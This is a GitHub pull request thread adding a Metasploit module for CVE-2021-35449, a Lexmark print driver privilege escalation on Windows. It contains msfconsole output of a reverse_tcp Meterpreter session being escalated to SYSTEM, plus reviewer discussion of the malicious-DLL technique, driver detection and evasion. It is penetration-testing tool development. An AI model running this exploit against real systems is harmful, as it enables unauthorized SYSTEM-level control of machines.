Lexmark Universal Print Driver Local Privilege Escalation
rapid7/metasploit-framework pull request #15519
Opened 2021-08-05 21:01 UTC by jacob-baines

This pull request is for [CVE-2021-35449](https://nvd.nist.gov/vuln/detail/CVE-2021-35449), a privilege escalation issue in a variety of Lexmark drivers including the Universal Print Driver.  I promised this module in my DEFCON talk, [Bring Your Own Print Driver Vulnerability](https://www.youtube.com/watch?v=vdesswZYz-8). In that talk, I demonstrate that low privileged users can install arbitrary drivers, so having vulnerable drivers in your back pocket is quite nice. This module *does not* interface with an evil printer, but it will escalate to SYSTEM if the driver is present.

The pull request is **very much** modeled after @space-r7's [Ricoh privilege escalation module](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ricoh_driver_privesc.rb)... to the point that they are credited in the module.

## Verification

List the steps needed to make sure this thing works

- [ ] Install attached Lexmark driver and add a printer using the driver.
- [ ] Start `msfconsole`
- [ ] Get a session with basic privileges
- [ ] Do: ```use exploit/windows/local/lexmark_driver_privesc```
- [ ] Do: ```set SESSION <sess_no>```
- [ ] Configure payload
- [ ] Do: ```run```
- [ ] You should get a shell running as SYSTEM.

## Example Output
Here is example output (also included in documentation):

```
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.0.0.8
lhost => 10.0.0.8
msf6 exploit(multi/handler) > set lport 1270
lport => 1270
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.0.0.8:1270 
[*] Sending stage (200262 bytes) to 10.0.0.7
[*] Meterpreter session 1 opened (10.0.0.8:1270 -> 10.0.0.7:50356) at 2021-08-04 16:01:23 -0400
meterpreter > getuid
Server username: MOURNLAND\lowlevel
meterpreter > sysinfo
Computer        : MOURNLAND
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use lexmark_driver_privesc
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
Matching Modules
================
   #  Name                                          Disclosure Date  Rank    Check  Description
   -  ----                                          ---------------  ----    -----  -----------
   0  exploit/windows/local/lexmark_driver_privesc  2021-07-22       normal  Yes    Lexmark Driver Privilege Escalation
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/local/lexmark_driver_privesc
[*] Using exploit/windows/local/lexmark_driver_privesc
msf6 exploit(windows/local/lexmark_driver_privesc) > set session 1
session => 1
msf6 exploit(windows/local/lexmark_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/lexmark_driver_privesc) > set lhost 10.0.0.8
lhost => 10.0.0.8
msf6 exploit(windows/local/lexmark_driver_privesc) > run
[*] Started reverse TCP handler on 10.0.0.8:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Lexmark GDL file is present
[*] Adding printer dnvCihT...
[*] Sending stage (200262 bytes) to 10.0.0.7
[*] Meterpreter session 2 opened (10.0.0.8:4444 -> 10.0.0.7:50382) at 2021-08-04 16:03:23 -0400
[*] Deleting printer dnvCihT
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
```

## About the patch
Unfortunately the patch doesn't make the .gdl file unreadable - it just seemed to strip out the .dll parsing. As such, it's difficult to know via check() if the target is vulnerable... without exploiting it. 🤷 Open to ideas!

2021-08-06 17:35 UTC, smcintyre-r7 requested changes

2021-08-06 17:35 UTC, smcintyre-r7 commented on documentation/modules/exploit/windows/local/lexmark_driver_privesc.md
> +## Vulnerable Application
We have a `msftidy_docs.rb` tool to lint the markdown docs. If you wouldn't mind, could you please address it's comments:
```
tools/dev/msftidy_docs.rb documentation/modules/exploit/windows/local/lexmark_driver_privesc.md 
documentation/modules/exploit/windows/local/lexmark_driver_privesc.md - [INFO] Missing Section: ## Options
documentation/modules/exploit/windows/local/lexmark_driver_privesc.md:25 - [WARNING] Should use single backquotes (`) for single line literals instead of triple backquotes (```)
documentation/modules/exploit/windows/local/lexmark_driver_privesc.md:26 - [WARNING] Should use single backquotes (`) for single line literals instead of triple backquotes (```)
documentation/modules/exploit/windows/local/lexmark_driver_privesc.md:27 - [WARNING] Should use single backquotes (`) for single line literals instead of triple backquotes (```)
documentation/modules/exploit/windows/local/lexmark_driver_privesc.md:34 - [WARNING] Code blocks using triple backquotes (```) should not be indented
documentation/modules/exploit/windows/local/lexmark_driver_privesc.md:94 - [WARNING] Code blocks using triple backquotes (```) should not be indented
```

The other thing is that each of the sections are indented when they don't need to be. In particular the scenarios section's indentation is then copied over into the rendered markdown output.

![image](https://user-images.githubusercontent.com/58950994/128547220-cc870a63-b739-4a4c-a2af-17be1fc2e8fc.png)

2021-08-06 17:35 UTC, smcintyre-r7 commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +    client.sys.process.execute(script_cmd, nil, { 'Hidden' => true })
Instead of using the Meterpreter API directly, you can simply call `cmd_exec(script_cmd)`. Hidden will be set for you already, along with Channelized and Subshell but this can be disabled through the opts if you need them turned off.

2021-08-06 17:35 UTC, smcintyre-r7 commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +    e_log("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
Seems like this should be using `fail_with` to prevent the module from continuing to run.

2021-08-06 17:35 UTC, smcintyre-r7 commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +    self.needs_cleanup = true
This doesn't look like it's being used anywhere. Can it be removed?

2021-08-06 17:35 UTC, smcintyre-r7 commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +    Rex.sleep(3)
It should be safe to just use `sleep` here, I'm not sure why the original module used Rex. [Both paths](https://github.com/rapid7/metasploit-framework/blob/master/lib/rex.rb#L101) wind up at `Rex::ThreadSafe.sleep`.

2021-08-06 17:40 UTC, smcintyre-r7 commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +    self.needs_cleanup = true
Nevermind, this is used by some of the library code to identify that this modules needs to have it's cleanup method run. Marking this as resolved.

2021-08-06 19:07 UTC, jacob-baines commented
@smcintyre-r7 rolled in the changes you suggested and retested successfully. Also ran doc tidy and fixed up the wonky spacing issues 👍

2021-08-09 03:58 UTC, gwillcox-r7 requested changes
Overall looks very good, just left a few comments, most are the same as on the other PR.

2021-08-09 03:58 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/lexmark_driver_privesc.md
> +DLL path with a malicious DLL path.
Which achieves what exactly? Modifying an XML file isn't exactly a vulnerability in and of itself. Explain to me why modifying this XML file has such significance and tie in with the following paragraphs so that I see why this is significant. Otherwise it just looks like a simple modification of some XML file and nothing more, and I'm pretty sure given this gives `SYSTEM` there is a lot more going on here that could be explained.

2021-08-09 03:58 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/lexmark_driver_privesc.md
> +[Various Lexmark printer drivers](http://support.lexmark.com/index?page=content&id=TE953) allow escalation of privileges on Windows systems.
Eh technically according to the advisory isn't it various Lexmark Universal Print Drivers? Also tie this into the following paragraph more to build up a more cohesive story. I've given an example below.

```suggestion
Various Lexmark Universal Print drivers, as listed at the [TE953 advisory page](http://support.lexmark.com/index?page=content&id=TE953) allow local authenticated users to elevate privileges to `SYSTEM` by overwriting the XML file XXXXX, which causes XXXX to happen when a printer driver is installed, thereby elevating user's permissions.
```

2021-08-09 03:58 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/lexmark_driver_privesc.md
> +
Overwriting a configuration file with a DLL doesn't seem to be whats happening here. Are you not adjusting an XML configuration file to point to the malicious DLL that you drop on the target? It seems unlikely that simply replacing a configuration file with a DLL file would lead to the DLL being loaded into memory in a correct manner.

2021-08-09 03:58 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/lexmark_driver_privesc.md
> +7. You should get a shell running as SYSTEM.
```suggestion
1. Install a vulnerable Lexmark driver
2. Start `msfconsole`
3. Get a session with basic privileges
4. Do: `use exploit/windows/local/lexmark_driver_privesc`
5. Do: `set SESSION <sess_no>`
6. Do: `run`
7. You should get a shell running as `SYSTEM`.
```

2021-08-09 03:58 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/lexmark_driver_privesc.md
> +### Tested with Lexmark Universal Print Driver v2 `v2.10.0.5`
```suggestion
### Lexmark Universal Print Driver v2.10.0.5
```

2021-08-09 03:58 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/lexmark_driver_privesc.md
> +
```suggestion
```

2021-08-09 03:58 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/lexmark_driver_privesc.md
> +
This seems to be extra output from some other command that got mismashed into this for some reason.

2021-08-09 03:58 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/lexmark_driver_privesc.md
> +
This options should occur earlier on in the documentation. Run `tools/dev/msftidy_docs.rb documentation/modules/exploit/windows/local/lexmark_driver_privesc.md` and fix the errors it reports.

2021-08-09 03:58 UTC, gwillcox-r7 commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +          to add and delete printers.
Apply the fixes from above to this section as well. As mentioned before you need to better explain why replacing the DLL path in a XML file is a security issue.

2021-08-09 03:58 UTC, gwillcox-r7 commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +        },
This section appears to be empty, is there a reason it is supplied given this won't do anything?
```suggestion
```

2021-08-09 03:58 UTC, gwillcox-r7 commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +    sleep(3)
Random question but is there a reason this sleep needs to be here directly after printing the output to screen? I can understand sleeping after executing a command to allow time for the command to execute but this seems a little bit odd. Is there something else going on that requires you to sleep? If so it would be good practice to add a comment in here documenting this.

2021-08-09 03:58 UTC, gwillcox-r7 commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +    # Unfortunately, the patch didn't alter permissions on the file.
Suggestion but is it possible to enumerate the installed drivers and their versions and check that way for a more accurate check? Seems like `Get-WmiObject Win32_PnPSignedDriver| select DeviceName, Manufacturer, DriverVersion` is a possibility for PowerShell but we know PowerShell is commonly detected in engagements so it would be good to find an alternative solution.

The one option I can see is `driverquery /FO TABLE` which will get the list of drivers installed and their names as well as the link date for some of the drivers. Not sure if that would help or not but just thought I'd recommend some ideas for getting around the issue of the patch not altering the permissions on the file.

2021-08-09 03:58 UTC, gwillcox-r7 commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +    drvr_name = 'Lexmark Universal v2'
Is there any chance this name can be randomized or does it have to be this driver name?

2021-08-09 10:09 UTC, jacob-baines commented on documentation/modules/exploit/windows/local/lexmark_driver_privesc.md
> +
The msftidy report is clean. Is there a different command line option I should use? Or perhaps you could tell me where in the documentation you believe this belongs?

2021-08-09 10:09 UTC, jacob-baines commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +    drvr_name = 'Lexmark Universal v2'
This does have to be the driver name. This name will get passed as a param to prnmngr.vbs, which is what is invoking the add printer logic using the vulnerable driver.

2021-08-09 10:25 UTC, jacob-baines commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +    # Unfortunately, the patch didn't alter permissions on the file.
Yeah, the solution I have here is lazy. I think I was just staying close to the ricoh version, and there is no real reason for that. I'll just rewrite this to use pnputil.exe to look at what's in the driver store, as that's all we need to exploit this and it gets pretty good details. e.g.

```
Published Name:     oem3.inf
Original Name:      lmud1o40.inf
Provider Name:      Lexmark International
Class Name:         Printers
Class GUID:         {4d36e979-e325-11ce-bfc1-08002be10318}
Driver Version:     10/01/2015 2.10.0.5
Signer Name:        Microsoft Windows Hardware Compatibility Publisher
```

2021-08-09 13:58 UTC, gwillcox-r7 commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +    client.sys.process.execute(script_cmd, nil, { 'Hidden' => true })
Making resolved as this was fixed in https://github.com/rapid7/metasploit-framework/pull/15519/commits/8d699c0c4eb525cacf4d52bf718deea60a8ee7da

2021-08-09 13:59 UTC, gwillcox-r7 commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +    e_log("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
Fixed in https://github.com/rapid7/metasploit-framework/pull/15519/commits/8d699c0c4eb525cacf4d52bf718deea60a8ee7da

2021-08-09 13:59 UTC, gwillcox-r7 commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +    Rex.sleep(3)
Fixed in https://github.com/rapid7/metasploit-framework/pull/15519/commits/8d699c0c4eb525cacf4d52bf718deea60a8ee7da

2021-08-09 14:02 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/lexmark_driver_privesc.md
> +
Huh odd, so normally this would go after the `Verification Steps` like https://github.com/rapid7/metasploit-framework/pull/15462/files does, however I thought `msftidy_docs.rb` was checking the order of things as usually if you place the headings out of order it will complain.

2021-08-09 14:03 UTC, gwillcox-r7 commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +    drvr_name = 'Lexmark Universal v2'
Sounds good, marking this as resolved 👍

2021-08-09 14:33 UTC, gwillcox-r7 commented
@jacob-baines Going to go ahead and try fix up some of these issues so long this morning so we can clear up some of this work that I can take on myself. Hopefully this should help save you some time and make the actual issue list a little more accurate r.e issues I'm not able to resolve myself.

2021-08-09 14:35 UTC, jacob-baines commented
Sounds good, @gwillcox-r7. Thanks! I should be able to tackle the remaining issues this evening.

2021-08-09 15:03 UTC, gwillcox-r7 commented
When you make the changes and forget to lint your own work 🤦‍♂️ Lets fix that up.

2021-08-09 15:43 UTC, gwillcox-r7 commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +        },
Fixed with https://github.com/rapid7/metasploit-framework/pull/15519/commits/838142362cc6175cb23fd1be4f8e9470e927a960

2021-08-09 15:43 UTC, gwillcox-r7 commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +          to add and delete printers.
Fixed with https://github.com/rapid7/metasploit-framework/pull/15519/commits/838142362cc6175cb23fd1be4f8e9470e927a960

2021-08-09 15:43 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/lexmark_driver_privesc.md
> +
Fixed with https://github.com/rapid7/metasploit-framework/pull/15519/commits/838142362cc6175cb23fd1be4f8e9470e927a960

2021-08-09 15:43 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/lexmark_driver_privesc.md
> +
Fixed with https://github.com/rapid7/metasploit-framework/pull/15519/commits/838142362cc6175cb23fd1be4f8e9470e927a960

2021-08-09 15:43 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/lexmark_driver_privesc.md
> +### Tested with Lexmark Universal Print Driver v2 `v2.10.0.5`
Fixed with https://github.com/rapid7/metasploit-framework/pull/15519/commits/838142362cc6175cb23fd1be4f8e9470e927a960

2021-08-09 15:44 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/lexmark_driver_privesc.md
> +7. You should get a shell running as SYSTEM.
Fixed with https://github.com/rapid7/metasploit-framework/pull/15519/commits/838142362cc6175cb23fd1be4f8e9470e927a960

2021-08-09 15:44 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/lexmark_driver_privesc.md
> +
Fixed with https://github.com/rapid7/metasploit-framework/pull/15519/commits/838142362cc6175cb23fd1be4f8e9470e927a960

2021-08-09 15:44 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/lexmark_driver_privesc.md
> +[Various Lexmark printer drivers](http://support.lexmark.com/index?page=content&id=TE953) allow escalation of privileges on Windows systems.
Created a more detailed explanation at https://github.com/rapid7/metasploit-framework/pull/15519/commits/838142362cc6175cb23fd1be4f8e9470e927a960, but feel free to let me know if this doesn't work. Marking resolved.

2021-08-09 15:45 UTC, gwillcox-r7 commented
@jacob-baines Created a more detailed description and fixed a few issues, but let me know if you don't like the format of the description and we can always adjust. Just tried to condense it down a bit whilst also explaining why the adjusting of the XML file is important.

2021-08-09 15:46 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/lexmark_driver_privesc.md
> +DLL path with a malicious DLL path.
Resolved with https://github.com/rapid7/metasploit-framework/pull/15519/commits/838142362cc6175cb23fd1be4f8e9470e927a960

2021-08-10 02:06 UTC, jacob-baines commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +    sleep(3)
Nope, none that I'm aware of. Removed.

2021-08-10 02:25 UTC, jacob-baines commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +    # Unfortunately, the patch didn't alter permissions on the file.
So this went really poorly. Let me provide a trip report.

As mentioned, I thought just using `pnputil.exe` and then extracting the inf / driver version would be enough. However, I quickly learned that (at least for Lexmark) the original name for the inf (`lmud1o40.inf` in the above example) is not a static value. It actually looks like Lexmark increments it for each release... so matching driver names to `inf` names is kind of a no go.

I also considered just using the date from the driver version and having a loose heuristic (vulnerable if date is before 07/2021) but I was looking at 2.15.0.2 (the patched version of the Universal Print Driver) and realized Lexmark didn't update the driver date :scream: 

So *then* I was looking at looking the vbs script (C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prndrvr.vbs). It outputs a lot of information, but not quite enough to be a slam dunk. I ended up with the following line:

```
res = cmd_exec('cmd.exe', '/c "cscript C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prndrvr.vbs -l | findstr /S /c:"Driver name Lexmark"')
```

Which will output something like:
```
Driver name Lexmark Universal v2 XL,3,Windows x64
Driver name Lexmark Printer Software G2 XL,3,Windows x64
Driver name Lexmark Universal v2,3,Windows x64
```
Which tells us these Lexmark drivers are in the driver store... just doesn't get us version information. So I added additional logic to filter known vulnerable driver names and added an option for the user to specify the driver name.

So that's a lot of words to say, I didn't improve the situation. I actually made it a bit more complicated in that the original version of this was only for the Universal Print Driver v2, and now I've made room for all over the vulnerable drivers to be added in (I feel like the Lexmark list grew since I last looked at it but... I could be losing it too). I'll round that out if we can tolerate this approach.

I did also set my check to return CheckCode::Detected given the ambiguous nature.

2021-08-10 02:27 UTC, jacob-baines commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +    # Unfortunately, the patch didn't alter permissions on the file.
And immediate follow up, the vbs script doesn't see the drivers if they are only staged in the driver store. So this change is no good. It'll have to be a `pnputil.exe` based solution.

So WIP. Sorry.

2021-08-10 02:35 UTC, jacob-baines commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +    # Unfortunately, the patch didn't alter permissions on the file.
Yeah, I think I'll have to go `pnputil.exe` to get the published inf name and then dig into `C:\Windows\inf` to parse the files there. Sorry for the spam! Just tossing in the idea while I have it.

2021-08-10 21:59 UTC, gwillcox-r7 requested changes
Overall changes look good, though I am concerned r.e effect of the changes on the fact that the `exploit` method now needs to be run alongside the `check` method, vs acting independently of the `check` method.

2021-08-10 22:30 UTC, jacob-baines commented
As mentioned, I switched over to using pnputil to discover the vulnerable drivers. This is desirable for the case where the driver was put in the driver store by an admin or an attacker (via CVE-2021-34481) but never installed during add printer operations. Metasploit's implementation of the Ricoh driver exploitation and the (just landed) Canon driver exploit wouldn't see vulnerable drivers in that context because neither examine the driver store.

I'll try to decouple check/exploit now.

2021-08-11 03:21 UTC, gwillcox-r7 commented
> As mentioned, I switched over to using pnputil to discover the vulnerable drivers. This is desirable for the case where the driver was put in the driver store by an admin or an attacker (via CVE-2021-34481) but never installed during add printer operations. Metasploit's implementation of the Ricoh driver exploitation and the (just landed) Canon driver exploit wouldn't see vulnerable drivers in that context because neither examine the driver store.
> 
> I'll try to decouple check/exploit now.

Ah in my experiments the driver had to be installed as a vulnerable driver for the vulnerable directory to be created. This is why I kept that check in for other module, along with the fact that the patch didn't seem to update the version output by `pnputil` so I wasn't sure how one could use that to detect vulnerable versions. I am also trying to get both these modules in by the Thursday morning cut off so they can land into this week's release; my apologies if I overlooked something in the process 😓

2021-08-11 08:49 UTC, jacob-baines commented
No worries. Looking back, I think the original pull request assumes that everyone would know all the things I yammered on about for 40ish minutes at DC... which is obviously an unfair assumption. Either way, I don't think this particular module can have a check that will say definitely if the target is vulnerable (without exploitation) 🤷‍♂️ 

As to the Thursday cutoff, I won't be able to make any adjustments today. This moment that I'm writing this is about the only free moment I'll have all day. 😓 If you think the module is close, I'm happy for whatever edits you might have time to introduce. Otherwise, I doubt I'll make an updates by Thurs. evening.

2021-08-11 14:50 UTC, gwillcox-r7 commented
> No worries. Looking back, I think the original pull request assumes that everyone would know all the things I yammered on about for 40ish minutes at DC... which is obviously an unfair assumption. Either way, I don't think this particular module can have a check that will say definitely if the target is vulnerable (without exploitation) 🤷‍♂️
> 
> As to the Thursday cutoff, I won't be able to make any adjustments today. This moment that I'm writing this is about the only free moment I'll have all day. 😓 If you think the module is close, I'm happy for whatever edits you might have time to introduce. Otherwise, I doubt I'll make an updates by Thurs. evening.

Yep thats fine, we can just make something that goes "hey this looks like its vulnerable" based on some criteria and return `CheckCode::Appears` if we have some way of determining if the target appears to be vulnerable or just return `CheckCode::Detected` if we really do have just no way of actively trying to detect it beyond checking if the driver is installed or not. Last resort would be to just make it return `CheckCode::Unknown` if we really have nothing we can do but for this module I don't think we need to go that low as we can at least determine if the vulnerable driver is installed or not and report that, whilst also noting users will need to run a full exploit for us to truly determine if the target is vulnerable or not.

And yeah no worries on the DC detail stuff, its understandable that it may have been a little confusing and you assumed people had watched your talk; happens to all of us 😄 I should have also noticed a few details on my end so that's my bad as well 😅

2021-08-11 16:22 UTC, gwillcox-r7 reviewed
One minor change and a minor edge case I found, but should be able to fix these up for you.

2021-08-11 16:22 UTC, gwillcox-r7 commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +  # as option. Otherwise, the first driver is selected.
`Otherwise the first vulnerable Lexmark driver listed in the driver store will be selected.`

2021-08-11 16:22 UTC, gwillcox-r7 commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +    m = res.scan(%r{Published Name:     ([^.]*\.inf)\r\nOriginal Name:      lmu.*?.inf\r\nProvider Name:      Lexmark International\r\nClass Name:         Printers\r\nClass GUID:         {4d36e979-e3
My issue with this is that can't the `Class Name` technically change along with the GUID? I'm just taking a look at https://docs.microsoft.com/en-us/windows-hardware/drivers/install/system-defined-device-setup-classes-available-to-vendors and I see `PNPPrinters` and `4658ee7e-f050-11d1-b6bd-00c04fa372a7` could also be used for SCSI/1394-enumerated printers.

Other than that this looks good though :)

2021-08-11 16:23 UTC, gwillcox-r7 commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +      @drvr_name = res[0]
Resolved in https://github.com/rapid7/metasploit-framework/pull/15519/commits/afa3d92774cac70726081fb5c5ea67367e07a853

2021-08-11 16:23 UTC, gwillcox-r7 commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +    end
Resolved in https://github.com/rapid7/metasploit-framework/pull/15519/commits/afa3d92774cac70726081fb5c5ea67367e07a853

2021-08-11 16:27 UTC, gwillcox-r7 commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +    # Unfortunately, the patch didn't alter permissions on the file.
No problem @jacob-baines thanks for taking the time to explain what you tried and what worked and what didn't, this is very helpful for anybody looking at this module in the future who wants to understand why certain choices were made. I'll keep this thread as unresolved so anyone who looks at this module in the future can see it easier 👍

2021-08-11 16:28 UTC, gwillcox-r7 commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +    # Unfortunately, the patch didn't alter permissions on the file.
On a related note if this issue is also applicable to the previous Canon PR that was landed I'm happy to adjust that as needed in another update PR if you feel that needs further tweaking to account for potential edge cases.

2021-08-11 17:15 UTC, gwillcox-r7 reviewed
Few other places that need to be updated for conistency of documentation but this otherwise looks good to test and land.

2021-08-11 17:15 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/lexmark_driver_privesc.md
> +to `LMUD1OUE.DLL` with a malicious DLL path.
This is going to need to be updated to `unires.dll` now that we changed the name of the file we are replacing.

2021-08-11 17:15 UTC, gwillcox-r7 commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +          to replace the DLL path to LMUD1OUE.DLL with a malicious DLL path.
This needs to change to `unires.dll` now that we changed the name of the file we are replacing.

2021-08-11 17:15 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/lexmark_driver_privesc.md
> +will inspect the ``C:\\ProgramData\\Lexmark Universal v2\\Universal Color Laser.gdl` file and will load the
```suggestion
will inspect the `C:\\ProgramData\\Lexmark Universal v2\\Universal Color Laser.gdl` file and will load the
```

2021-08-11 17:15 UTC, gwillcox-r7 commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +          C:\ProgramData\Lexmark Universal v2\Universal Color Laser.gdl
If we change this in the documentation then we should also change this in the module as well.
```suggestion
          C:\\ProgramData\\<driver name>\\Universal Color Laser.gdl
```

2021-08-11 17:15 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/lexmark_driver_privesc.md
> +will inspect the ``C:\\ProgramData\\Lexmark Universal v2\\Universal Color Laser.gdl` file and will load the
```suggestion
will inspect the ``C:\\ProgramData\\<driver name>\\Universal Color Laser.gdl` file and will load the
```

2021-08-11 17:15 UTC, gwillcox-r7 commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +          C:\ProgramData\Lexmark Universal v2\Universal Color Laser.gdl file and will
```suggestion
          C:\ProgramData\<driver name>\Universal Color Laser.gdl file and will
```

2021-08-11 19:41 UTC, gwillcox-r7 commented on modules/exploits/windows/local/lexmark_driver_privesc.rb
> +    # Unfortunately, the patch didn't alter permissions on the file.
This was fixed in https://github.com/rapid7/metasploit-framework/pull/15519/commits/b3dbf7c0e97292357a0a1a536042d9c23b3d70d5 so going to mark this as resolved since we are now using `pnputil.exe`

2021-08-11 20:02 UTC, gwillcox-r7 approved these changes

2021-08-11 20:04 UTC, merged

2021-08-11 20:05 UTC, gwillcox-r7 commented
# Release Notes
A new module has been added to exploit CVE-2021-35449, a privilege escalation issue in a variety of Lexmark drivers including the Universal Print Driver. Successful exploitation allows local attackers to gain `SYSTEM` level code execution.